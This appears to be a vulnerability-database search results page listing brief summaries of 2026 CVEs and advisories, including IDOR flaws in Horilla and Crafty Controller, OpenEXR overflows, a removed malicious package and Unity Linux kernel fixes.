21928 matches found
CVE-2026-40865 Horilla: Insecure Direct Object Reference at `/employee/view-file/<int:id>
Horilla is a free and open source Human Resource Management System HRMS. In 1.5.0, an insecure direct object reference in the employee document viewer allows any authenticated user to access other employees’ uploaded documents by changing the document ID in the request. This exposes sensitive HR...
CVE-2026-5652
An insecure direct object reference vulnerability in the Users API component of Crafty Controller allows a remote, authenticated attacker to perform user modification actions via improper API permissions validation...
CVE-2026-25542
Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. Starting in version 0.43.0 and prior to versions 1.0.2, 1.3.4, 1.6.2, 1.9.3, and 1.11.1, trusted resources verification policies match a resource source string refSource.URI against spec.resources.pattern...
CVE-2026-5652
CVE-2026-5652 affects Crafty Controller’s Users API component, enabling an authenticated remote attacker to perform user modification actions due to improper API permissions validation. Reported CVSS 3.1 base score 9.0 (CRITICAL) with network attack vector, low attack complexity, high confidentia...
CVE-2026-5652
An insecure direct object reference vulnerability in the Users API component of Crafty Controller allows a remote, authenticated attacker to perform user modification actions via improper API permissions validation...
Remote Code Execution (RCE)
Overview Affected versions of this package are vulnerable to Remote Code Execution RCE via insufficient sanitization of user inputs to reference, path, and branch parameters when handling git resources in GitJobExecutor. An attacker can inject commands, exposing credentials, removing files, or...
MINI-8274-56H2-P4MP
Bulletin has no description...
AZL-9340 CVE-2022-24801 for package python-twisted is not applicable
This CVE either no longer is or was never applicable...
CVE-2026-40244
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.4.0 through 3.4.9, 3.3.0 through 3.3.9, and 3.2.0 through 3.2.7, internaldwacompressor.h:1722 performs curc-width curc-height in int32...
CVE-2026-40250
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.4.0 through 3.4.9, 3.3.0 through 3.3.9, and 3.2.0 through 3.2.7, internaldwacompressor.h:1040 performs chan-width chan-bytesperelement in...
Malicious Package
Overview ac-sasskit-internal is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
PT-2026-34013
An insecure direct object reference vulnerability in the Users API component of Crafty Controller allows a remote, authenticated attacker to perform user modification actions via improper API permissions validation...
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010834)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010834 advisory. In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Fix pci device refcount leak in pprnotifier As comment of pcigetdomainbusandslot says,...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-011236)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011236 advisory. In the Linux kernel, the following vulnerability has been resolved: Input: imxsckey - fix memory corruption on unload This is supposed to be priv but we accidentally...
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010780)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010780 advisory. In the Linux kernel, the following vulnerability has been resolved: leds: led-core: Fix refcount leak in ofledget classfinddevicebyofnode calls classfinddevice, it...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-010863)
"The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010863 advisory. In the Linux kernel, the following vulnerability has been resolved: ASoC: fslmqs: move ofnodeput to the correct location ofnodeput should have been done directly...
Unity Linux 20.1050e / 20.1070e Security Update: kernel (UTSA-2026-011224)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011224 advisory. In the Linux kernel, the following vulnerability has been resolved: fbdev/ep93xx-fb: Do not assign to struct fbinfo.dev Do not assing the Linux device to struct...
Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-010707)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-010707 advisory. In the Linux kernel, the following vulnerability has been resolved: mm/damon/dbgfs: fix 'struct pid' leaks in 'dbgfstargetidswrite' DAMON debugfs interface increases...
Unity Linux 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-011034)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-011034 advisory. In the Linux kernel, the following vulnerability has been resolved: hwrng: amd - Fix PCI device refcount leak foreachpcidev is implemented by pcigetdevice. The comme...
Unity Linux 20.1060a / 20.1070a Security Update: kernel (UTSA-2026-006916)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-006916 advisory. In the Linux kernel, the following vulnerability has been resolved: sctp: add a refcnt in sctpstreampriorities to avoid a nested loop With this refcnt added in...